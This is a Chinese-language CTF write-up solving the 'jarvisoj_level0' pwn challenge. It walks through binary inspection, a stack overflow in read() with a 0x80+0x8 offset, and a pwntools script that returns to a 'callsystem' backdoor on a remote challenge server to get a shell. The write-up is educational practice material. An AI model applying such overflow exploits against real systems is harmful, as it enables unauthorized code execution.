当前位置: 首页 > news >正文

PWN手的成长之路-13-jarvisoj_level0

news 2025/10/9 13:06:47

image

远程连接环境,查看交互。输出了一句 Hello,World,之后就无任何反应了。
image

file 查看文件。64位 ELF 可执行文件。
image

checksec 查看文件安全属性。只开启了 NX 保护。
image

IDA 打开文件。查看 main 函数发现最后 return 的是 vulnerable_function(1LL)
image

查看 vulnerable_function() 函数。发现了 read() ,会造成栈溢出。
image
查看栈溢出大小:0x80+0x8
image

并且找到了后门函数。
image

开始编写exp:

from pwn import *
r=remote('node5.buuoj.cn',28954)
context.arch='amd64'
context.os='Linux'
elf=ELF('./pwn')
backdoor_addr=elf.symbols['callsystem']
payload=cyclic(0x80+0x8)+p64(backdoor_addr)
r.sendline(payload)
r.interactive()

得到shell,拿到flag。
image

http://www.hskmm.com/?act=detail&tid=27253

相关文章:

  • 计算机毕设 java 基于 Java 的题库管理强大的系统 基于 SSM+JavaWeb 的题库全流程管理平台 Java+MySQL 的题库服务一体化系统
  • 微信最新协议API上线!个人号快速接入
  • Firefox火狐浏览器插件下载、安装路径、备份插件、手动安装插件
  • 2025.10.9午后有感
  • Firefox火狐浏览器插件下载、安装路径
  • 实用指南:PyTest框架学习
  • PWN手成长之路-12-pwn1_sctf_2016
  • WPF应用最小化到系统托盘
  • Hyper-v 安装 Android9
  • test8 - post
  • 素材
  • 数论上
  • 数论中
  • 数论下
  • 赌狗确实很爽,也确实很容易上天台
  • 20252430毛姝涵
  • 在AI技术唾手可得的时代,挖掘开发者工具新需求成为关键突破点
  • uniapp 简单封装接口请求
  • 【SPIE出版】第五届算法、高性能计算与人工智能国际学术会议(AHPCAI 2025)
  • 深入解析:recipes中声明 DEPENDS += “virtual/kernel“ 的效果
  • 2025 防洪板源头厂家最新推荐榜单:铝合金 / 移动 / 应急款精准测评,稳定性能品牌优选指南
  • 完整教程:【复习】计网每日一题--PPP链路
  • Ubuntu安装 IDEA
  • 精密星历内插的MATLAB代码实现
  • .                    当项目规模失控时:架构师的“止损”之道
  • 2025 年护栏厂家最新推荐排行榜:涵盖锌钢防撞桥梁交通市政不锈钢波形围墙道路护栏优质企业锌钢/防撞/桥梁/交通/市政/不锈钢/波形护栏厂家推荐
  • .                                  为什么资深开发者越来越少写代码?
  • .                                  性能优化的尽头,是洞察力
  • 遗传算法的多车场车辆路径问题求解
  • 元数据提供器(IMetadataDetailsProvider)是什么